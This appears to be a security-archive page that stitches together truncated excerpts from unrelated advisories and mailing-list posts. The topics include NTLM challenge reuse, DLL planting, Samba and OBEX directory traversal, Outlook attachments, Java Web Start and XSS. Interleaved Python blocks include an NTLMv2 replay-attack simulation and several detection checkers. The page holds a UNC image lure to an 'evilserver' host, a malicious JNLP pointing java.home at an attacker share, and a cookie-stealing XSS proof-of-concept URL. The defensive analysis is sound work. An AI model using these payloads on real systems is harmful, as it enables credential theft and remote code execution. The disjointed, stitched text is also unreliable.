Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

Advisory ID: cisco-sa-20111019-sns

Revision 1.0

For Public Release 2011 October 19 16:00  UTC (GMT)

Re: OpenSSH security advisory: cbc.adv

> CPNI-957037[1]:
> 
> The OpenSSH team has been made aware of an attack against the SSH
> protocol version 2 by researchers at the University of London.
> Unfortunately, due to the report lacking any detailed technical
> description of the attack and CPNI's unwillingness to share necessary
> information, we are unable to properly assess its impact.

It is really sad that researchers are prevented from sharing details with
developers by some lame institute. The OpenSSH developers were asked to
undersign the document below. Apart from asking to be cited as the

Windows SMB NTLM Authentication Weak Nonce Vulnerability

        (ii) An attacker A connects to system S and sends multiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to a
web server with similar <IMG> tags. Upon receiving the connections from
system S, the attacker's SMB server will respond with the previously
obtained challenges and will store the corresponding responses returned
by the remote system. Attacker A now has a set of responses which are
the challenges encrypted with user U's credentials.
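A self-contained simulation of steps (ii) and (iii) above, added here as an example and not code from the advisory. The challenge/response function has the NTLMv2 shape (HMAC-MD5 over the server challenge and the client blob, with the blob returned beside the proof); the NTLMv2 hash, the client blob, the session bookkeeping and the counter-based "weak" challenge generator are constructed stand-ins, and nothing speaks real SMB. The point it makes is that the attacker never needs the user's hash: a stored response is valid for exactly the server challenge it was computed over, so the whole attack reduces to how soon system S hands out a challenge it has handed out before.

```python
import hashlib
import hmac
import os


def ntlmv2_response(ntlmv2_hash: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2-shaped response: NTProofStr (HMAC-MD5 over server challenge + client
    blob) followed by the blob itself, so the server can verify without knowing
    the client's random part in advance.  The hash is a constructed stand-in."""
    proof = hmac.new(ntlmv2_hash, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


class VictimClient:
    """User U on system S: holds the hash and answers whatever challenge it is shown."""

    def __init__(self, ntlmv2_hash: bytes) -> None:
        self._hash = ntlmv2_hash

    def answer(self, server_challenge: bytes) -> bytes:
        blob = b"\x01\x01" + b"\x00" * 6 + os.urandom(8)  # constructed blob with a client nonce
        return ntlmv2_response(self._hash, server_challenge, blob)


class Server:
    """System S: issues a challenge at negotiate time and verifies the response later."""

    def __init__(self, ntlmv2_hash: bytes, challenge_source) -> None:
        self._hash = ntlmv2_hash
        self._next_challenge = challenge_source
        self._pending = {}  # session id -> challenge issued for that session
        self._sessions = 0

    def negotiate(self):
        self._sessions += 1
        challenge = self._next_challenge()
        self._pending[self._sessions] = challenge
        return self._sessions, challenge

    def authenticate(self, session: int, response: bytes) -> bool:
        challenge = self._pending.pop(session)
        proof, blob = response[:16], response[16:]
        expected = hmac.new(self._hash, challenge + blob, hashlib.md5).digest()
        return hmac.compare_digest(proof, expected)


def weak_challenges(period: int = 16):
    """Constructed stand-in for a predictable challenge source: a counter that
    wraps after `period` values, so every challenge soon comes around again."""
    state = {"n": 0}

    def next_challenge() -> bytes:
        state["n"] = (state["n"] + 1) % period
        return state["n"].to_bytes(8, "little")

    return next_challenge


def strong_challenges():
    """What the server should do instead: 8 fresh random bytes per session."""
    return lambda: os.urandom(8)


def challenge_reuse_attack(server: Server, victim: VictimClient,
                           harvest: int = 32, max_attempts: int = 64):
    """Returns the attempt on which a replayed response was accepted, or None if
    the server never reissued a harvested challenge.  The attacker only stores
    and replays responses; it never learns the hash."""
    # (ii) open throwaway sessions to S and keep every challenge it hands out
    harvested = set()
    for _ in range(harvest):
        _session, challenge = server.negotiate()
        harvested.add(challenge)
    # the rogue SMB server shows those challenges to U (lured there via UNC
    # <IMG> links) and stores U's responses, keyed by challenge
    stored = {challenge: victim.answer(challenge) for challenge in harvested}
    # (iii) reconnect to S until it reissues a harvested challenge, then replay
    for attempt in range(1, max_attempts + 1):
        session, challenge = server.negotiate()
        if challenge in stored and server.authenticate(session, stored[challenge]):
            return attempt
    return None
```

Against `Server(hash, weak_challenges())` the replay is accepted on the first reconnect after harvesting; against `Server(hash, strong_challenges())` the harvested set is never reissued, which is the only property the fix needs to deliver.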

RE: [Full-disclosure] Windows Vista/7 lpksetup dll hijack

Hi Thor, 

Thanks to Microsoft's "defense in depth," double-clicking an .exe from a remote share
pops up a security warning. In contrast, double-clicking a data file that opens a
vulnerable application (which downloads and executes a .dll from the same share)
doesn't trigger such a security warning. You might argue that users don't care about
such warnings and you might be right.

On the upside (or downside, depending on one's role in this game), our researchers
have already found an attack vector for binary planting (a superset of dll hijacking)

ACROS Security: Remote Binary Planting in VMware Tools for Windows (ASPR #2010-04-12-1)

Analysis 
========

As a result of an incorrect dynamic link library loading in VMware Tools 
for Windows, an attacker can cause her malicious DLL to be loaded and 
executed from local drives, a remote Windows share, and even a share 
located on the Internet. 

All a remote attacker has to do is plant a malicious DLL with a specific 
name on a network share and get the user to open any file from this 
network location with any Windows application - which should require 

[SECURITY] [DSA 1908-1] New samba packages fix several vulnerabilities

Vulnerabilities and Exposures project identifies the following problems:

The mount.cifs utility is missing proper checks for file permissions when
used in verbose mode.  This allows local users to partly disclose the
content of arbitrary files by specifying the file as credentials file and
attempting to mount a samba share (CVE-2009-2948).

A reply to an oplock break notification which samba doesn't expect could
lead to the service getting stuck in an infinite loop.  An attacker
can use this to perform denial of service attacks via a specially crafted
SMB request (CVE-2009-2906).

Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability

 Description
_______________

OneNote is included as part of Office 2007, and provides an easy
way to store, manage, and share information.

OneNote installs a URL Handler under the registry key 
  HKEY_CLASSES_ROOT\OneNote 

with an open command specified as 

Re: Samba Remote Zero-Day Exploit

path but arbitrary code.

The fix is to do what everybody with a directory traversal bug has to  
do, block out of path relative directories. In this specific case,  
prevent the creation of symlinks where the target is out of the SMB  
share's range. (Still allow navigation to such symlinks if one exists,  
though.)



On Feb 6, 2010, at 8:21 AM, "Stefan Kanthak" <stefan.kanthak@nexgo.de>  

RE: RE: [Full-disclosure] Windows Vista/7 lpksetup dll hijack

>Am Montag, den 25.10.2010, 22:56 +0000 schrieb Thor (Hammer of God):
>> The main point is that you've got to get people to not only connect up
>> to your remote share, but you've got to get them to execute the file,
>> etc.  So I'm just wondering what makes this anything more than any
>> other "put a malicious link here to make the user execute it" or email
>> attachment business, particularly when you say "Remote Code
>> Execution."
>
>Err... as far as I know, the interesting part is having the current path be set to
>something you can control (to make windows load evil dlls), and if you just link

FW: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server

About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.

Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories).  Files can be shared anonymously, or via EFSWS's built-in user management.   EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access).    Users log in, and are presented with a menu of files that have been published and that are made available for download.

EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc.   A free db parser is available at:
http://www.mghsoft.com/

Please see vendor site and db engine site for more details.

Re: Samba Remote Zero-Day Exploit

> (On a side note, you're not going to see this sort of symlink stuff on
> Windows,

What exactly do you mean?
Traversing symlinks on the server/share, or creation of "wide" symlinks
by the client on the server/share?

Since Windows 2000, NTFS has supported "junctions", which pretty much
resemble Unix symlinks, but only for directories.
See <http://support.microsoft.com/kb/205524/en-us>

Skype URI Handler Input Validation

Changes were made to Skype to remove available command line arguments when
the /URI argument is present, and to resolve the discovered injection vulnerability. 
 
Although many of the useful arguments have been disallowed, Security-Assessment.com
found that the /Datapath argument can be included and directed to a remote SMB
share directly through a specially crafted Skype URI.

The Datapath argument specifies the location of the Skype configuration files and
security policy. Specifying a Datapath argument will override any local security
policy defined in the Windows registry.


Re: Re: OpenSSH security advisory: cbc.adv

> (interesting ;););))?
>
> If so, should that mean that they implicitely recognize the very good
> work done by the community?
>
> If so, why not act politely with the community and share knowledge?
>
> This would make the software better, so that they could still use it in
> their applications.
>
> How can't they understand that?

Yoono Firefox Extension - Privileged Code Injection

+-----------+
|Description|
+-----------+

The Yoono Firefox extension provides an interface for 
users to share objects with their friends on social 
networks from any website. It allows users to select 
images from a website to be shared, which publishes 
that image to their friends.

Security-Assessment.com discovered that Yoono's share 

Re: Samba Remote Zero-Day Exploit

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the system remotely.
Required is a valid samba account for a share which is writeable, OR
a writeable share which is configured to be a guest account share;
in that case this is a pre-auth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

reviving the botnets@ mailing list: a new strategy in fighting cyber crime

The public botnets@ mailing list, where malicious activity on the Internet 
can be openly shared, has been revived, and boy is it active.

Warning: live samples and malicious URLs are openly shared there.

Mailing list URL: 
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reasons, thinking and explanations:
http://gadievron.blogspot.com/2008/08/public-sharing-and-new-statregy-in.html

Join us at OWASP Mumbai Meet : 6th September 2007

Interested in Sponsoring??

Send a mail to dharmeshmm at mastek dot com or call at +91 98670 75327 to understand the sponsorship details.

Got MORE !! Ideas for the Event ??
Quickly write back to dharmeshmm at mastek dot com or call at +91 98670 75327 to share and make this a successful meet !!

Details at: http://www.owasp.org/index.php/Mumbai#Theme_:_Privacy_in_21st_Century
Please feel free to pass this information on to your colleagues so that everyone can share and gain maximum information.



Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission

On Thu, Sep 15, 2011 at 7:11 PM, Michael Schmidt <mschmidt@drugstore.com> wrote:
> Someone’s just not reading the bulletins – Note the term “Remote” –
> including webdav, so a share that could be fully controlled by the
> exploiter. At least that is what I am understanding.
>
>
>
> Updates released on September 13, 2011
>
> Microsoft Security Bulletin MS11-071, "Vulnerability in Windows Components

Hacker Space Fest 2009 CFP: Call For Paper

explosion of colors.

Sensitivity, we could say, is what is left to a human being when she
has nothing anymore, and differentiates her from the body corporate or
the institution, that are, in essence, devoid of it. Therefore, Art
definitely remains the public space to share between humans, and only
between us. And if it is the last one to share, we propose to explore it
and take it over during the upcoming edition of the Hacker Space
Festival, from the 26th to 30th of June, 2009 at Vitry sur Seine[9].

========================================================================

Google Docs (HTML code) Multiple Cross Site Scripting Vulnerabilities

I. Background:
Google Docs is an online application which makes it possible to "Create and share your work online". You can use it to 
create Documents, Presentations, Spreadsheets and Forms.


II. Description:
Multiple cross site scripting vulnerabilities were identified in Google Docs. A remote attacker could write a malformed 
document and invite, through Google Docs sharing option, other users to see it in order to obtain their cookies. It's also possible

Microsoft Bluetooth Stack OBEX Directory Traversal

References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/Microsoft-Bluetooth-Stack-Directory-Traversal.html

Description:
Most Windows Mobile 5.0 & 6 devices ship with the Microsoft Bluetooth stack; only a few use others, such as the Widcomm Bluetooth stack. Among all the Bluetooth services that may be implemented in the stack, OBEX FTP is the most common.

The OBEX FTP Bluetooth service can be used to share files through Bluetooth, not only by sending files but also by allowing remote devices to browse local shared folders and download files. Usually, the service is configured in such a way that a specific directory is shared and the user can place there all the files he would like to share with other people. The default directory is My Device\My Documents\Bluetooth Share. A different directory may be selected by the user, however the Bluetooth wizard usually doesn't allow specifying any directory outside the My Device\My Documents\ or Memory Card\My Documents\ paths. This is done for security reasons, so that the user cannot expose sensitive files or information through Bluetooth.

There is a directory traversal vulnerability in the OBEX FTP service of the Microsoft Bluetooth stack on Windows Mobile 5.0 & 6 devices. A remote attacker who has previously obtained authentication and authorization rights can use tools like ObexFTP to traverse to parent directories outside the default Bluetooth shared folder. This means the attacker can browse folders outside the share, download the files they contain, and upload files into them.

The only requirement is that the attacker has authentication and authorization privileges for the OBEX FTP service; pairing with the remote Windows Mobile device should be enough to obtain them. Once the attacker has those privileges, the remaining actions are transparent to the user.
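One containment helper covering two passages on this page: the fix proposed in the Samba symlink thread above (refuse to create a symlink whose target resolves outside the share, while still following links that already exist) and the OBEX FTP traversal just described (refuse a path step that would leave the shared folder). This is an added example, not Samba or Microsoft code. Paths are handled as POSIX strings with `posixpath`, backslashes from a Windows Mobile client are normalised to `/`, and the share roots and file names are constructed for the demonstration.

```python
import posixpath


class ShareRoot:
    """Lexical containment checks against one exported directory.  Nothing here
    touches a real filesystem; the root and the paths tested are constructed."""

    def __init__(self, root: str) -> None:
        self.root = posixpath.normpath(root)

    def _inside(self, abs_path: str) -> bool:
        abs_path = posixpath.normpath(abs_path)
        return abs_path == self.root or abs_path.startswith(self.root + "/")

    def resolve(self, base_dir: str, name: str) -> str:
        """Absolute, dot-free path that `name` denotes when interpreted from
        `base_dir`.  The result may lie outside the share; callers decide."""
        name = name.replace("\\", "/")
        if posixpath.isabs(name):
            return posixpath.normpath(name)
        return posixpath.normpath(posixpath.join(base_dir, name))

    # (a) Samba: a client asks to create <link_path> -> <target> inside the share
    def symlink_allowed(self, link_path: str, target: str) -> bool:
        """`link_path` is share-relative; a relative `target` is interpreted from
        the directory the link lives in, which is how the kernel will follow it."""
        link_dir = posixpath.dirname(self.resolve(self.root, link_path))
        return self._inside(self.resolve(link_dir, target))

    # (b) OBEX FTP: one SETPATH step (a name, "..", or a backslash path) from cwd
    def step_allowed(self, cwd: str, component: str) -> bool:
        return self._inside(self.resolve(cwd, component))

    def setpath(self, cwd: str, component: str) -> str:
        """New working directory after the step, or PermissionError if it escapes."""
        if not self.step_allowed(cwd, component):
            raise PermissionError("%r leaves %s" % (component, self.root))
        return self.resolve(cwd, component)
```

Because the check is purely lexical it belongs at creation time (Samba) or at every navigation step (OBEX), on the string the client supplied. It does not decide what to do about a pre-existing in-share symlink whose target is already outside; that is the server's follow policy, which the thread above wants left permissive.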


Outlook PR_ATTACH_METHOD file execution vulnerability

Through specially crafted TNEF streams with certain MAPI attachment
properties, it is possible to set a path name for files to be executed.
When a user double-clicks such an attachment or message, Outlook will
proceed to execute the file named by the path value. These files can be
local files, but also files stored remotely, for example on a file
share. Exploitation is limited by the fact that it is not possible for
attackers to supply command line options.
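Added detection logic for the attachment shape described above; it is not code from the advisory. The property tags and PR_ATTACH_METHOD values are the documented MAPI constants, but the attachment records are constructed dictionaries of the kind a TNEF or MSG parser hands back, so no TNEF parsing happens here, and the policy (block every by-reference attachment, whatever the path) is this example's own choice.

```python
# Documented MAPI property tags (property id << 16 | property type) and the
# PR_ATTACH_METHOD values that matter here.
PR_ATTACH_METHOD = 0x37050003
PR_ATTACH_FILENAME_W = 0x3704001F
PR_ATTACH_PATHNAME_A = 0x3708001E
PR_ATTACH_PATHNAME_W = 0x3708001F
PR_ATTACH_LONG_PATHNAME_A = 0x370D001E
PR_ATTACH_LONG_PATHNAME_W = 0x370D001F

ATTACH_BY_VALUE = 1            # file data is inside the message
ATTACH_BY_REFERENCE = 2        # the three by-reference variants: data lives at a
ATTACH_BY_REF_RESOLVE = 3      # pathname the sender chose, not in the message
ATTACH_BY_REF_ONLY = 4
BY_REFERENCE_METHODS = {ATTACH_BY_REFERENCE, ATTACH_BY_REF_RESOLVE, ATTACH_BY_REF_ONLY}
PATH_TAGS = (PR_ATTACH_LONG_PATHNAME_W, PR_ATTACH_LONG_PATHNAME_A,
             PR_ATTACH_PATHNAME_W, PR_ATTACH_PATHNAME_A)


def path_kind(path: str) -> str:
    """Classify a pathname the way a mail gateway cares about."""
    p = path.strip()
    if p.startswith("\\\\") or p.startswith("//"):
        return "unc"
    if len(p) >= 3 and p[1] == ":" and p[2] in "\\/":
        return "local-absolute"
    return "relative"


def attachment_verdict(props: dict) -> tuple:
    """(action, reason) for one attachment's decoded MAPI properties."""
    method = props.get(PR_ATTACH_METHOD, ATTACH_BY_VALUE)
    paths = [props[tag] for tag in PATH_TAGS if tag in props]
    if method not in BY_REFERENCE_METHODS:
        return ("allow", "attachment data is carried by value")
    kinds = sorted({path_kind(p) for p in paths}) or ["missing"]
    if "unc" in kinds:
        return ("block", "by-reference attachment pointing at a remote share")
    return ("block", "by-reference attachment pointing at a %s path" % "/".join(kinds))


def scan_attachments(attachments: list) -> list:
    return [attachment_verdict(a) for a in attachments]


SAMPLE_ATTACHMENTS = [  # constructed records, as a TNEF or MSG parser would return them
    {PR_ATTACH_METHOD: ATTACH_BY_VALUE, PR_ATTACH_FILENAME_W: "report.pdf"},
    {PR_ATTACH_METHOD: ATTACH_BY_REFERENCE,
     PR_ATTACH_LONG_PATHNAME_W: r"\\evilserver\share\a.exe"},
    {PR_ATTACH_METHOD: ATTACH_BY_REF_ONLY,
     PR_ATTACH_PATHNAME_A: r"C:\Windows\System32\calc.exe"},
]
```

The reason string distinguishes remote from local targets only for the analyst's benefit: a by-reference attachment that points at a local path is still a sender-chosen execution target, which is why the verdict is the same.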

------------------------------------------------------------------------
See also
------------------------------------------------------------------------

smbfs and apache+php source code disclosure

Because of the different filename handling in POSIX and Windows, there is
an issue with resolving filenames that have a backslash "\" character
appended on a Windows share.
Consider a Windows share mounted on a Linux box with a PHP script on it,
let's say info.php.
Executing find info.php and find info.php\\ returns the same file,
info.php (the same goes for cat info.php\\).

When using this share to serve PHP scripts with apache (from a linux
box) you can use it to display php script content directly to your

CVE-2008-2086: Java Web Start File Inclusion via System Properties Override

used for the java.home value. It is not yet known whether or not UNC
paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path.  However, by
setting this path to a network share which hosted a valid JRE
installation, the JCE classes loaded correctly.  If such a network share
were hosted by the attacker, then arbitrary code could potentially be
loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like.
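Added example, not VSR's proof of concept (which is not reproduced on this page): a check over the `<property>` elements of a JNLP file that flags overrides of the two properties the advisory names, java.home and java.ext.dirs, and any other property whose value points at a UNC path. Treating file: URLs the same way is this example's own assumption. The sample JNLP is constructed, with .invalid hostnames.

```python
import xml.etree.ElementTree as ET

# Properties named in the advisory: java.home (shown to work over a UNC share)
# and java.ext.dirs (listed as untested).  Flagged by name regardless of value.
LOADER_PROPERTIES = {"java.home", "java.ext.dirs"}


def looks_remote(value: str) -> bool:
    """UNC path, or (assumption of this example) a file: URL."""
    v = value.strip()
    return v.startswith("\\\\") or v.startswith("//") or v.lower().startswith("file:")


def jnlp_property_findings(jnlp_xml: str) -> list:
    """(name, value, reason) for each <property> a launcher should refuse.
    Stdlib ElementTree/expat does not fetch external entities, so parsing an
    untrusted JNLP here does not add an XXE exposure."""
    root = ET.fromstring(jnlp_xml)
    findings = []
    for prop in root.iter("property"):
        name = prop.get("name", "")
        value = prop.get("value", "")
        if name in LOADER_PROPERTIES:
            findings.append((name, value, "overrides where the JRE loads its own classes from"))
        elif looks_remote(value):
            findings.append((name, value, "property value points at a remote location"))
    return findings


MALICIOUS_JNLP = r"""<jnlp spec="1.0+" codebase="http://example.invalid/app/" href="app.jnlp">
  <information><title>demo</title><vendor>constructed sample</vendor></information>
  <resources>
    <j2se version="1.6+"/>
    <jar href="app.jar"/>
    <property name="java.home" value="\\attacker.invalid\jre"/>
    <property name="app.theme" value="dark"/>
  </resources>
  <application-desc main-class="Main"/>
</jnlp>
"""
```

Properties are only one way to smuggle a -D setting; a reviewer extending this would apply the same name and value tests to any `java-vm-args` attribute on the `<j2se>` element.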

TwonkyMedia Server Multiple Cross-Site Scripting Vulnerabilities

===========================================================================

1. BACKGROUND:

TwonkyMedia Server is DLNA-compliant, UPnP AV-compliant software
that allows users to share and stream media to hundreds of popular consumer
electronics devices. It is available for Windows, Linux, Macintosh and
for various different architectures.
TwonkyMedia Server is bundled on a variety of CE and NAS devices from
leading manufacturers, including: Buffalo LinkStation, HP Media Vault,
LaCie Ethernet Disk, Philips Streamium music players, Western Digital

RE: Samba Remote Zero-Day Exploit

> 
> NO, Windows SMB server crosses reparse points!

Not in my testing, at least not for junctions and symlinks. User with
requisite authority could traverse the junctions and symlinks locally,
but not remotely via a share.

> But as Dan Kaminsky pointed out, you need to have administrative
> rights to remotely create a junction on an SMB share, so the non-admin user
> can't get himself access to files outside a share he's allowed to
Calcium web calendar: Reflected XSS

Proof of concept, version 4.0.4:
https://[yourserver]/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=XSS_%3Cbody%20onload=alert(document.cookie)%3E_here

Impact:
An attacker could impersonate the victim to do any activity the victim is authorized to do through a compromised web site, for example, initiate funds transfers or access private data. Under some circumstances the existence of this vulnerability in one web site could be used to attack other web sites in the same DNS domain. For example, if host "a.example.com" shares cookies with host "b.example.com" and "b" is vulnerable, "b" can be used to attack "a".

Versions tested:
Calcium 4.0.4  Vulnerable
Calcium 3.10   Vulnerable


ASPR #2010-11-05-01: Remote Binary Planting in Adobe Flash Player

Analysis 
========

As a result of an incorrect dynamic link library loading in Adobe Flash 
Player for Windows, an attacker can cause her malicious DLL to be loaded 
and executed from local drives, remote Windows shares, and even shares 
located on the Internet. 

All a remote attacker has to do is plant a malicious DLL with a specific 
name on a network share and get the user to open a specially crafted file 
from this network location - which should require minimal social 

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
